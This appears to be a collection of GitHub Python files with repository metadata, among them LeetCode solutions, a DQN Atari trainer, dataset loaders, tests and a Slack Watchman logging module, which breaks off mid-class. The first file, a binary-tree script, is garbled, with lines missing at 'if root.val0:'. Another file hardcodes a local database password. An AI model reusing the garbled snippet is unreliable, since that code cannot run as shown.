+{"seq_id":"39829664992","text":"class Node: \n def __init__(self,key): \n self.left = None\n self.right = None\n self.val = key\ndef insert(root,node):\n if root is None:\n root=node\n else:\n if root.val0:\n h=res.pop(0)\n print(h.val,end=' ')\n if h.left:\n res.append(h.left)\n if h.right:\n res.append(h.right)\n g-=1\n print(' ')\n print() \nt=int(input())\nfor i in range(t):\n n=int(input())\n lst=list(map(int,input().split()))\n r=Node(lst[0])\n for i in range(1,n):\n insert(r,Node(lst[i]))\n levelorder(r)\n","repo_name":"keerthi4600/Smarthinterviews-hackerrank-python","sub_path":"Level order of tree.py","file_name":"Level order of tree.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"32250404390","text":"class Solution:\n def canChoose(self, groups: List[List[int]], nums: List[int]) -> bool:\n i = 0\n for grp in groups:\n for j in range(i, len(nums)):\n if nums[j:j+len(grp)] == grp:\n i = j+len(grp)\n break\n else:\n return False\n return True\n ","repo_name":"monishshah18/Leetcode","sub_path":"form-array-by-concatenating-subarrays-of-another-array/form-array-by-concatenating-subarrays-of-another-array.py","file_name":"form-array-by-concatenating-subarrays-of-another-array.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"91"}
+{"seq_id":"33574742498","text":"from sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import *\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.inspection import inspect\n\ndef criaModelo():\n engine = create_engine(\"postgresql+psycopg2://postgres:admim@localhost:5432/teste\", echo=False)\n\n base = automap_base()\n\n base.prepare(engine, schema=\"northwind\", reflect=True)\n\n print(base.classes.keys())\n categories = base.classes.categories;\n shippers = base.classes.shippers;\n suppliers = base.classes.suppliers;\n employees = base.classes.employees;\n orders = base.classes.orders;\n customers = base.classes.customers;\n order_details = base.classes.order_details;\n products = base.classes.products;\n print(orders.keys())\n\n\n\ncriaModelo();\n","repo_name":"Danielhfc/DesenvolvimentoWeb","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"42753563182","text":"from typing import List\n\nclass Solution:\n def destCity(self, paths: List[List[str]]) -> str:\n cities = set()\n\n for path in paths:\n cities.add(path[0])\n\n for path in paths:\n dest = path[1]\n if dest not in cities:\n return dest \n return \"\"\npaths = [[\"London\",\"New York\"],[\"New York\",\"Lima\"],[\"Lima\",\"Sao Paulo\"]]\nsol1 = Solution()\nresult = sol1.destCity(paths)\nprint(result)","repo_name":"GiacomoComitani/leetcode","sub_path":"problems/1436.destination.city/destCity.py","file_name":"destCity.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"14019440486","text":"from stable_baselines3 import DQN\nfrom stable_baselines3.common.env_util import make_atari_env\nfrom stable_baselines3.common.vec_env import VecFrameStack\nimport torch\nimport config\nimport wandb\nfrom wandb.integration.sb3 import WandbCallback\nfrom utils import unzip_file, CustomWandbCallback\nimport os\n\n\n\n'''\nSet up the appropriate directories for logging and saving the model\n'''\nos.makedirs(config.log_dir, exist_ok=True)\nos.makedirs(config.save_path, exist_ok=True)\n\n#Create the callback that logs the mean reward of the last 100 episodes to wandb\ncustom_callback = CustomWandbCallback(config.check_freq, config.save_path)\n\n\n'''\nSet up loging to wandb\n'''\n#Set wandb to log the training process\nif config.log_to_wandb:\n #Set wandb to log the training process\n wandb.init(project=config.project_train, entity = config.entity, name=config.name_train, notes=config.notes, sync_tensorboard=config.sync_tensorboard)\n #wandb_callback is a callback that logs the training process to wandb, this is done because wandb.watch() does not work with sb3\n wandb_callback = WandbCallback()\n\n\n'''\nSet up the environment\n'''\n# Create multiple environments and wrap them correctly\nenv = make_atari_env(\"BreakoutNoFrameskip-v4\", n_envs=config.n_envs, seed=config.seed)\nenv = VecFrameStack(env, n_stack=config.n_stack)\n\n\n'''\nSet up the model\n'''\n#Create the model with the parameters specified in config.py, go to config.py to see the meaning of each parameter in detail\nmodel = DQN(policy=config.policy,\n env=env, \n learning_rate=config.learning_rate,\n buffer_size=config.buffer_size,\n learning_starts=config.learning_starts, \n batch_size=config.batch_size,\n tau=config.tau,\n gamma=config.gamma,\n train_freq=config.train_freq,\n gradient_steps=config.gradient_steps,\n replay_buffer_class=config.replay_buffer_class,\n replay_buffer_kwargs=config.replay_buffer_kwargs,\n optimize_memory_usage=config.optimize_memory_usage,\n target_update_interval=config.target_update_interval,\n exploration_fraction=config.exploration_fraction,\n exploration_initial_eps=config.exploration_initial_eps,\n exploration_final_eps=config.exploration_final_eps,\n max_grad_norm=config.max_grad_norm,\n tensorboard_log=config.log_dir,\n policy_kwargs=config.policy_kwargs,\n verbose=config.verbose,\n seed=config.seed,\n device=config.device,\n _init_setup_model=config._init_setup_model)\n \n\nprint(\"model in device: \", model.device)\n\n#Load the model if config.pretrained is set to True in config.py\nif config.pretrained:\n model = DQN.load(config.saved_model_path, env=env, verbose=config.verbose, tensorboard_log=config.log_dir)\n #Unzip the file a2c_Breakout_1M.zip and store the unzipped files in the folder DQN_Breakout_unzipped\n unzip_file(config.saved_model_path, config.unzip_file_path) \n model.policy.load_state_dict(torch.load(os.path.join(config.unzip_file_path, \"policy.pth\")))\n model.policy.optimizer.load_state_dict(torch.load(os.path.join(config.unzip_file_path, \"policy.optimizer.pth\")))\n\n'''\nTrain the model and save it\n'''\n#model.learn will train the model for 1e6 timesteps, timestep is the number of actions taken by the agent, \n# in a game like breakout, the agent takes an action every frame, then the number of timesteps is the number of frames,\n# which is the number of frames in 1 game multiplied by the number of games played.\n#The average number of frames in 1 game is 1000, so 1e6 timesteps is 1000 games more or less.\n#log_interval is the number of 
timesteps between each log, in this case, the training process will be logged every 100 timesteps.\n#callback is a callback that logs the training process to wandb, this is done because wandb.watch() does not work with sb3\n\nif config.log_to_wandb:\n model.learn(total_timesteps=config.total_timesteps, log_interval=config.log_interval, callback=[wandb_callback, custom_callback], progress_bar=True)\nelse:\n model.learn(total_timesteps=config.total_timesteps, log_interval=config.log_interval, callback=[custom_callback], progress_bar=True)\n\n#Save the model \nmodel.save(config.saved_model_path[:-4]) #remove the .zip extension from the path\n\n''' \nClose the environment and finish the logging\n'''\nenv.close()\nif config.log_to_wandb:\n wandb.finish() \n","repo_name":"Neilus03/Learn2Earn_RL","sub_path":"BreakOut/Breakout_sb3_DQN/train_DQN.py","file_name":"train_DQN.py","file_ext":"py","file_size_in_byte":4476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"12696022437","text":"'''\nBusiest Time in The Mall\n\nThe Westfield Mall management is trying to figure out what the busiest moment\nat the mall was last year. You’re given data extracted from the mall’s door\ndetectors. Each data point is represented as an integer array whose size is\n3. The values at indices 0, 1 and 2 are the timestamp, the count of visitors,\nand whether the visitors entered or exited the mall (0 for exit and 1 for\nentrance), respectively. Here’s an example of a data point: [ 1440084737, 4,\n0 ].\n\nNote that time is given in a Unix format called Epoch, which is a nonnegative\ninteger holding the number of seconds that have elapsed since 00:00:00 UTC,\nThursday, 1 January 1970.\n\nGiven an array, data, of data points, write a function findBusiestPeriod that\nreturns the time at which the mall reached its busiest moment last year. The\nreturn value is the timestamp, e.g. 1480640292. Note that if there is more\nthan one period with the same visitor peak, return the earliest one.\n\nAssume that the array data is sorted in an ascending order by the timestamp.\nExplain your solution and analyze its time and space complexities.\n\nExample:\n\ninput: data = [ [1487799425, 14, 1], \n [1487799425, 4, 0],\n [1487799425, 2, 0],\n [1487800378, 10, 1],\n [1487801478, 18, 0],\n [1487801478, 18, 1],\n [1487901013, 1, 0],\n [1487901211, 7, 1],\n [1487901211, 7, 0] ]\n\noutput: 1487800378 # since the increase in the number of people\n # in the mall is the highest at that point\n\nConstraints:\n\n [time limit] 5000ms\n\n [input] array.array.integer data\n 1 ≤ data.length ≤ 100\n\n [output] integer\n'''\n\n# Two-pass, O(n) solution:\n# Step 1:\n# Initialise a dictionary of [Timestamp]: int which is the numebr of people who entered at that timestamp (can be negative)\n# Go down the array\n# If timestamp in timestamp_dict:\n# plus or minus\n# Else then we create a new entry\n\n# Step 2:\n# Go through the dictionary, keep a running count, and then return the timestamp with the highest count\n\n\ndef find_busiest_period(data):\n last_timestamp = data[0][0]\n peak_timestamp = data[0][0]\n peak_visitors = 0\n curr_visitors = 0\n for (timestamp, number, io) in data:\n # If timestamp == last_timestamp, then we append number to curr_visitors\n # Otherwise, we set last_timestamp = timestamp and we set curr_visitors = number\n # -number if io == 0, number otherwise\n delta_visitors = number if io else -number\n if timestamp == last_timestamp:\n curr_visitors += delta_visitors\n else:\n if peak_visitors < curr_visitors:\n peak_visitors = curr_visitors\n peak_timestamp = last_timestamp\n\n last_timestamp = timestamp\n curr_visitors += delta_visitors\n\n if peak_visitors < curr_visitors:\n peak_visitors = curr_visitors\n peak_timestamp = last_timestamp\n\n return peak_timestamp\n\n\n'''\n# [[0,5,1]] \n => timestamp = last_timestamp \n curr_visitors += delta_visitors # curr_visitors = 5\n peak_visitors = 5\n \n return 5\n \n[0 14, 1], \n[0, 4, 0],\n[0 2, 0],\n[1, 10, 1],\n\nlast_timestamp = 0, peak, current = 0\n\nfor loop:\n [0, 14, 1]\n delta = 14\n timestamp IS EQUAL == last_timestamp:\n curr += delta # curr = 14\n peak = 0\n \n [1,4,0]\n delta = -4\n timestamp NIS EQUAL \n curr += delta # curr = 10\n peak not updated\n \n [0,2,0]\n delta = -2\n curr += delta # curr = 8\n peak not updated\n \n [1,10,1]\n delta = 1\n peak = curr = 8\n last_timestamp = 1\n curr_visitors = 9\n\n'''\n\ndata = [[1487799425, 14, 1],\n [1487799425, 4, 0],\n [1487799425, 2, 0],\n [1487800378, 10, 1],\n 
[1487801478, 18, 0],\n [1487801478, 18, 1],\n [1487901013, 1, 0],\n [1487901211, 7, 1],\n [1487901211, 7, 0]]\nprint(find_busiest_period(data)) # 1487800378\n","repo_name":"lieuzhenghong/programming-practice","sub_path":"problems/pramp_busiest_time.py","file_name":"pramp_busiest_time.py","file_ext":"py","file_size_in_byte":3972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"5785444557","text":"import unittest\nimport json\nfrom unittest.mock import patch, Mock\nfrom models import get_users_data\n\n\nclass TestGet20Users(unittest.TestCase):\n\n @patch('requests.get')\n def test_successful_response(self, mock_get):\n # Mocking a successful response\n mock_response = Mock()\n mock_response.status_code = 200\n mock_data = {\n \"total\": 217,\n \"data\": [{\"nickname\": \"Alice\", \"isOnline\": True, \"lastSeenDate\": None},\n {\"nickname\": \"Bob\", \"isOnline\": False, \"lastSeenDate\": \"2023-09-25T10:30:00+00:00\"},\n {\"nickname\": \"Snack\", \"isOnline\": False, \"lastSeenDate\": \"2023-09-24T10:30:00+00:00\"},\n {\"nickname\": \"Nick\", \"isOnline\": False, \"lastSeenDate\": \"2023-09-26T12:00:00+00:00\"}]\n }\n mock_response.json.return_value = mock_data\n mock_response.text = json.dumps(mock_data) # mock the .text attribute\n mock_get.return_value = mock_response\n\n # Calling the function\n result = get_users_data({'offset': 0})\n\n # Asserting the result\n self.assertEqual(len(result), 4)\n self.assertEqual(result[0]['nickname'], \"Alice\")\n self.assertEqual(result[1]['nickname'], \"Bob\")\n self.assertEqual(result[2]['nickname'], \"Snack\")\n self.assertEqual(result[3]['nickname'], \"Nick\")\n\n @patch('requests.get')\n def test_failed_response(self, mock_get):\n # Mocking a failed response\n mock_response = Mock()\n mock_response.status_code = 400\n mock_get.return_value = mock_response\n\n # Calling the function\n result = get_users_data({'offset': 0})\n\n # Asserting the result\n self.assertEqual(result, [])\n","repo_name":"YaroslavKSE/Last_seen_Task","sub_path":"TestGetUsers.py","file_name":"TestGetUsers.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"1867882049","text":"import argparse\nimport cv2\nimport json\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom pathlib import Path\n\nscale = 3\nwidth = 101\nheight = 101\ncoverage_diameter = 6\n\n\ndef plot_sim():\n args = get_parser()\n data_path = Path(args.json_path_data)\n data = json.load(open(data_path, \"r\"))\n\n image = np.zeros((width, height, 3), dtype=np.uint8)\n\n ltime = []\n time_offset = int(list(data.keys())[0])\n covered_percentage = []\n\n for time in data:\n ltime.append(int(time) - time_offset)\n\n for id in data[time]:\n lx = np.array([i[\"position_x\"] for i in data[time][id]])\n lx = (lx + width / 2).astype(int) # To image coordinates\n ly = np.array([i[\"position_y\"] for i in data[time][id]])\n ly = (ly + height / 2).astype(int) # To image coordinates\n\n for x, y in zip(lx, ly):\n if out_of_bounds(x, y):\n continue\n cv2.circle(image, (x, y), coverage_diameter, (255, 255, 255), -1)\n\n covered_pixels = 0\n for row in image:\n for pixel in row:\n if pixel[0] == 255:\n covered_pixels += 1\n\n covered_percentage.append((covered_pixels / (width * height)) * 100)\n\n image = cv2.resize(\n image, (width * scale, height * scale), interpolation=cv2.INTER_LINEAR\n )\n\n if not cv2.imwrite(\"src/data_logging/plots/coveragemap.jpg\", cv2.flip(image, 0)):\n raise Exception(\"Could not write image\")\n\n # Remove last entries, which are likely incomplete\n ltime.pop()\n covered_percentage.pop()\n\n plt.plot(ltime, covered_percentage, \"r\")\n plt.xlabel(\"Time (seconds)\")\n plt.ylabel(\"Coverage (%)\")\n plt.title(\"Accumulative Coverage\")\n plt.axhline(y=95, linestyle=\":\")\n plt.grid()\n plt.savefig(str(data_path.with_suffix(\"\")) + \"coverage_percentage_plot.png\")\n plt.close()\n\n\ndef out_of_bounds(px_x, px_y):\n if px_x < 0 or px_x >= width:\n return True\n if px_y < 0 or px_y >= height:\n return True\n return False\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(\n prog=\"plot_json_coveragemap\",\n description=\"Plot coverage map from JSON with OpenCV.\",\n )\n\n parser.add_argument(\"json_path_data\", help=\"Path to the JSON data file\")\n\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n plot_sim()\n","repo_name":"PositiveBeat/nthom18-master-workspace","sub_path":"src/data_logging/utils/plot_json_coveragemap.py","file_name":"plot_json_coveragemap.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"30370325641","text":"import pytest\nfrom pytest_mock import MockerFixture\n\nfrom app.api.dtos import Gene\nfrom app.api.use_cases import GetInfoByGeneSymbol\nfrom app.core.db_config import AsyncSessionMaker\n\nsession_maker = AsyncSessionMaker\n\n\n@pytest.mark.asyncio\nasync def test_use_case_with_data(mocker: MockerFixture):\n mocker.patch(\n 'sqlalchemy.ext.asyncio.session.AsyncSession.execute',\n return_value=[\n ('gene_symbol', 'stable_id', 'transcript_id'),\n ('gene_symbol', 'stable_id', 'another_transcript_id'),\n ],\n )\n data = await GetInfoByGeneSymbol(gene_symbol='gene_symbol').execute()\n assert data == [\n Gene(\n **{\n 'gene_symbol': 'gene_symbol',\n 'gene_stable_id': 'stable_id',\n 'transcript_ids': ['transcript_id', 'another_transcript_id'],\n }\n )\n ]\n\n\n@pytest.mark.asyncio\nasync def test_use_case_no_data(mocker: MockerFixture):\n mocker.patch('sqlalchemy.ext.asyncio.session.AsyncSession.execute', return_value=[])\n data = await GetInfoByGeneSymbol(gene_symbol='gene_symbol').execute()\n assert data == []\n","repo_name":"cleeper-fly/tech_test","sub_path":"tests/genes/test_use_cases.py","file_name":"test_use_cases.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"32061232903","text":"import sys\r\nimport glob\r\nfrom natsort import natsorted\r\nsys.path.append(\"..\")\r\nfrom datasets.Base import BaseDataset\r\n\r\n\r\nclass SICE_Dataset(BaseDataset):\r\n\t\"\"\"\r\n\tSICE dataset file structure:\r\n\t\tdataset_dir/\t# base_dir\r\n\t\t\tDataset_Part1/\t\t\t# train set\r\n\t\t\t\t1/\t\t\t\t# image 1\r\n\t\t\t\t2/\t\t\t\t# image 2\r\n\t\t\t\t...\r\n\t\t\t\tlabel/\r\n\t\t\t\t\t1.jpg\t\t# target 1\r\n\t\t\t\t\t...\r\n\t\t\tDataset_Part2/\t\t\t# test set\r\n\t\t\t\t1/\t\t\t\t# image 1\r\n\t\t\t\t2/\t\t\t\t# image 2\r\n\t\t\t\t...\r\n\t\t\t\tlabel/\r\n\t\t\t\t\t1.jpg\t\t# target 1\r\n\t\t\t\t\t...\r\n\t\"\"\"\r\n\tdef __init__(self, image_dir, resize=None, augment=False, low_res=None, under_expose_only=False):\r\n\t\t# SICE dataset has multiple exposure level for 1 input image, if under_expose_only is enabled,\r\n\t\t# we will grab only lower-half of the exposure levels (under-exposed)\r\n\t\tself.under_expose_only = under_expose_only\r\n\t\tsuper().__init__(image_dir, resize, augment, low_res)\r\n\r\n\tdef extract_image_pairs(self, dataset_dir):\r\n\t\t\"\"\"\r\n\t\textract images paired with corresponding reference images (under Label/)\r\n\t\t- under_expose_only: if enabled, only select under-exposed images for each scene,\r\n\t\t\te.g. if there are 7 images, select only the first 3 images;\r\n\t\t\t\tif there are 9 images, select only the first 4 images.\r\n\t\treturn:\r\n\t\t\tlist of tuple paths,\r\n\t\t\t\te.g. [(some-dir/1/1.jpg, some-dir/label/1.jpg), (some-dir/1/2.jpg, some-dir/label/1.jpg), ...]\r\n\t\t\"\"\"\r\n\t\tlabel_list = glob.glob(dataset_dir + \"Label/**.**\", recursive=True)\r\n\t\tlabel_list = natsorted(label_list)\r\n\t\tdata_list = []\r\n\t\tfor i, label_path in enumerate(label_list):\r\n\t\t\tjpgs = glob.glob(dataset_dir + str(i+1) + \"/**.**\")\r\n\t\t\tjpgs = natsorted(jpgs)\r\n\t\t\tif self.under_expose_only:\r\n\t\t\t\t# remove over-exposed images\r\n\t\t\t\tjpgs = jpgs[:len(jpgs)//2]\r\n\t\t\t# add (image, reference) pair to data list\r\n\t\t\tfor jpg in jpgs:\r\n\t\t\t\tdata_list.append((jpg, label_path))\r\n\t\t\r\n\t\treturn data_list\r\n\t\r\n\r\nif __name__ == \"__main__\":\r\n\t# Example of how to use this dataset\r\n\ttrain_dir = \"/home/ppnk-wsl/capstone/Dataset/SICE/Dataset_Part1/\"\r\n\ttest_dir = \"/home/ppnk-wsl/capstone/Dataset/SICE/Dataset_Part2/\"\r\n\r\n\ttrain_set = SICE_Dataset(train_dir)\r\n\ttest_set = SICE_Dataset(test_dir, under_expose_only=True)\r\n\r\n\r\n","repo_name":"bznick98/bilateral-image-enhance","sub_path":"datasets/SICE.py","file_name":"SICE.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"4483481861","text":"import argparse\nimport socket\nfrom jubatus.classifier.client import Classifier\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-n\", \"--name\", help=\"set the name of the file to be saved\")\nparser.add_argument(\"--host\", help=\"set the host address\")\nparser.add_argument(\"--port\", help=\"set the port number\")\n\nargs = parser.parse_args()\nprint(args)\nhost_ip = args.host if args.host else socket.gethostbyname(socket.gethostname())\nport = args.port if args.port else 9199\n\nclient = Classifier(host_ip, port, '')\nif args.name:\n client.save(args.name)\n print(\"file saved at /tmp of the \"+host_ip+\" unless you specified output path with -d/--datadir when you started server process.\")\nelse:\n print(\"[Error] specify the model's name to be saved!\")","repo_name":"nobuyukioishi/Jubatus-utils","sub_path":"jubatus_model_saver.py","file_name":"jubatus_model_saver.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"21266905734","text":"import json\nimport dataclasses\nimport logging\nimport os\nimport sys\nimport logging.handlers\nimport re\nimport traceback\nimport csv\nfrom collections.abc import Mapping\nfrom logging import Logger\nfrom typing import Any, Dict, List, ClassVar, Protocol\nfrom colorama import Fore, Back, Style, init\n\n\nclass StdoutLogger:\n def __init__(self, **kwargs):\n self.debug = kwargs.get('debug')\n self.print_header()\n init()\n\n def log(self,\n mes_type: str,\n message: Any,\n **kwargs) -> None:\n\n notify_type = kwargs.get('notify_type')\n\n if not self.debug and mes_type == 'DEBUG':\n return\n\n if dataclasses.is_dataclass(message):\n message = dataclasses.asdict(message)\n\n if notify_type == \"workspace\":\n message = f'WORKSPACE: \\n' \\\n f' ID: {message.get(\"id\")} \\n' \\\n f' NAME: {message.get(\"name\")} \\n' \\\n f' DOMAIN: {message.get(\"domain\")} \\n' \\\n f' URL: {message.get(\"url\")}'\n mes_type = 'WORKSPACE'\n if notify_type == \"user\":\n message = f'USER: \\n' \\\n f' ID: {message.get(\"id\")} \\n' \\\n f' NAME: {message.get(\"display_name\")} \\n' \\\n f' EMAIL: {message.get(\"email\")} \\n' \\\n f' JOB_TITLE: {message.get(\"title\")} \\n' \\\n f' ADMIN: {message.get(\"is_admin\")} \\n' \\\n f' OWNER: {message.get(\"is_owner\")} \\n' \\\n f' HAS_2FA: {message.get(\"has_2fa\")}'\n mes_type = 'USER'\n if notify_type == \"result\":\n if message.get('message'):\n if message.get('message').get('conversation').get('is_im'):\n conversation_type = 'Direct Message'\n elif message.get('message').get('conversation').get('is_private'):\n conversation_type = 'Private Channel'\n else:\n conversation_type = 'Public Channel'\n\n if isinstance(message.get('message').get('user'), Mapping):\n user = f\"{message.get('message', {}).get('user', {}).get('display_name')} -\" \\\n f\" {message.get('message', {}).get('user', {}).get('email')}\"\n else:\n user = message.get('message').get('user')\n\n message = 'POST_TYPE: Message' \\\n f' POSTED_BY: {user}' \\\n f' POSTED_ON: {message.get(\"message\").get(\"created\")} \\n' \\\n f' CONVERSATION: {message.get(\"message\").get(\"conversation\").get(\"name\")}' \\\n f' CONVERSATION_TYPE: {conversation_type}' \\\n f' URL: {message.get(\"message\").get(\"permalink\")} \\n' \\\n f' POTENTIAL_SECRET: {message.get(\"match_string\")} \\n' \\\n f' -----'\n\n elif message.get('file'):\n message = 'POST_TYPE: File' \\\n f' POSTED_BY: {message.get(\"user\", {}).get(\"display_name\")} ' \\\n f'- {message.get(\"user\").get(\"email\")}' \\\n f' CREATED: {message.get(\"file\").get(\"created\")} \\n' \\\n f' FILE_NAME: {message.get(\"file\").get(\"name\")} \\n' \\\n f' PRIVATE_URL: {message.get(\"file\").get(\"url_private_download\")} \\n' \\\n f' PUBLIC_PERMALINK: {message.get(\"file\").get(\"permalink_public\")} \\n' \\\n f' -----'\n mes_type = 'RESULT'\n try:\n self.log_to_stdout(message, mes_type)\n except Exception as e:\n print(e)\n self.log_to_stdout(message, mes_type)\n\n def log_to_stdout(self,\n message: Any,\n mes_type: str) -> None:\n\n try:\n\n reset_all = Style.NORMAL + Fore.RESET + Back.RESET\n key_color = Fore.WHITE\n base_color = Fore.WHITE\n high_color = Fore.WHITE\n style = Style.NORMAL\n\n if mes_type == \"NOTIFY\":\n base_color = Fore.CYAN\n high_color = Fore.CYAN\n key_color = Fore.CYAN\n style = Style.NORMAL\n elif mes_type == 'INFO':\n base_color = Fore.WHITE\n high_color = Fore.WHITE\n key_color = Fore.WHITE\n style = Style.DIM\n mes_type = '-'\n elif mes_type == 'WORKSPACE':\n base_color = 
Fore.LIGHTBLUE_EX\n high_color = Fore.LIGHTBLUE_EX\n key_color = Fore.LIGHTBLUE_EX\n style = Style.NORMAL\n mes_type = '+'\n elif mes_type == 'USER':\n base_color = Fore.RED\n high_color = Fore.RED\n key_color = Fore.RED\n style = Style.NORMAL\n mes_type = '+'\n elif mes_type == 'WARNING':\n base_color = Fore.YELLOW\n high_color = Fore.YELLOW\n key_color = Fore.YELLOW\n style = Style.NORMAL\n mes_type = '!'\n elif mes_type == \"SUCCESS\":\n base_color = Fore.LIGHTGREEN_EX\n high_color = Fore.LIGHTGREEN_EX\n key_color = Fore.LIGHTGREEN_EX\n style = Style.NORMAL\n mes_type = '>>'\n elif mes_type == \"DEBUG\":\n base_color = Fore.WHITE\n high_color = Fore.WHITE\n key_color = Fore.WHITE\n style = Style.DIM\n mes_type = '#'\n elif mes_type == \"ERROR\":\n base_color = Fore.MAGENTA\n high_color = Fore.MAGENTA\n key_color = Fore.MAGENTA\n style = Style.NORMAL\n elif mes_type == \"CRITICAL\":\n base_color = Fore.RED\n high_color = Fore.RED\n key_color = Fore.RED\n style = Style.NORMAL\n elif mes_type == \"RESULT\":\n base_color = Fore.LIGHTGREEN_EX\n high_color = Fore.LIGHTGREEN_EX\n key_color = Fore.LIGHTGREEN_EX\n style = Style.NORMAL\n mes_type = '!'\n\n # Make log level word/symbol coloured\n type_colorer = re.compile(r'([A-Z]{3,})', re.VERBOSE)\n mes_type = type_colorer.sub(high_color + r'\\1' + base_color, mes_type.lower())\n # Make header words coloured\n header_words = re.compile('([A-Z_0-9]{2,}:)\\s', re.VERBOSE)\n message = header_words.sub(key_color + Style.BRIGHT + r'\\1 ' + Fore.WHITE + Style.NORMAL, str(message))\n sys.stdout.write(\n f\"{reset_all}{style}[{base_color}{mes_type}{Fore.WHITE}]{style} {message}{Fore.WHITE}{Style.NORMAL}\\n\")\n except Exception:\n if self.debug:\n traceback.print_exc()\n sys.exit(1)\n print('Formatting error')\n\n def print_header(self) -> None:\n print(\" \".ljust(79) + Style.BRIGHT)\n\n print(Fore.MAGENTA + Style.BRIGHT +\n \"\"\"\n ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀\n ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⠾⠛⢉⣉⣉⣉⡉⠛⠷⣦⣄⠀⠀⠀⠀\n ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⠋⣠⣴⣿⣿⣿⣿⣿⡿⣿⣶⣌⠹⣷⡀⠀⠀\n ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⠁⣴⣿⣿⣿⣿⣿⣿⣿⣿⣆⠉⠻⣧⠘⣷⠀⠀\n ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⡇⢰⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠀⠀⠈⠀⢹⡇⠀\n ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡇⢸⣿⠛⣿⣿⣿⣿⣿⣿⡿⠃⠀⠀⠀⠀⢸⡇⠀\n ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣷⠀⢿⡆⠈⠛⠻⠟⠛⠉⠀⠀⠀⠀⠀⠀⣾⠃⠀\n ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⣧⡀⠻⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⠃⠀⠀\n ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢼⠿⣦⣄⠀⠀⠀⠀⠀⠀⠀⣀⣴⠟⠁⠀⠀⠀\n ⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⣦⠀⠀⠈⠉⠛⠓⠲⠶⠖⠚⠋⠉⠀⠀⠀⠀⠀⠀\n ⠀⠀⠀⠀⠀⠀⣠⣾⣿⣿⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n ⠀⠀⠀⠀⣠⣾⣿⣿⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n ⠀⠀⠀⣾⣿⣿⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n ⠀ ⠈⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n \"\"\" + Style.RESET_ALL\n )\n print(' Slack Watchman ')\n print(Style.DIM + ' Slack enumeration and exposed secrets detection tool ' + Style.RESET_ALL)\n print(' ')\n print(Style.BRIGHT + ' by PaperMtn - GNU General Public License')\n print(' '.ljust(79) + Fore.GREEN)\n\n\nclass EnhancedJSONEncoder(json.JSONEncoder):\n def default(self, o):\n if dataclasses.is_dataclass(o):\n return dataclasses.asdict(o)\n return super().default(o)\n\n\nclass JSONLogger(Logger):\n def __init__(self, name: str = 'Slack Watchman', **kwargs):\n super().__init__(name)\n self.notify_format = logging.Formatter(\n '{\"timestamp\": \"%(asctime)s\", \"level\": \"NOTIFY\", \"scope\": \"%(scope)s\", \"severity\": '\n '\"%(severity)s\", \"detection_type\": \"%(type)s\", \"detection_data\": %(message)s}')\n self.info_format = logging.Formatter(\n '{\"timestamp\": \"%(asctime)s\", \"level\": \"%(levelname)s\", \"message\": \"%(message)s\"}')\n self.success_format = logging.Formatter(\n '{\"timestamp\": \"%(asctime)s\", \"level\": \"SUCCESS\", \"message\": \"%(message)s\"}')\n self.user_format = logging.Formatter(\n '{\"timestamp\": \"%(asctime)s\", \"level\": \"USER\", \"message\": %(message)s}')\n 
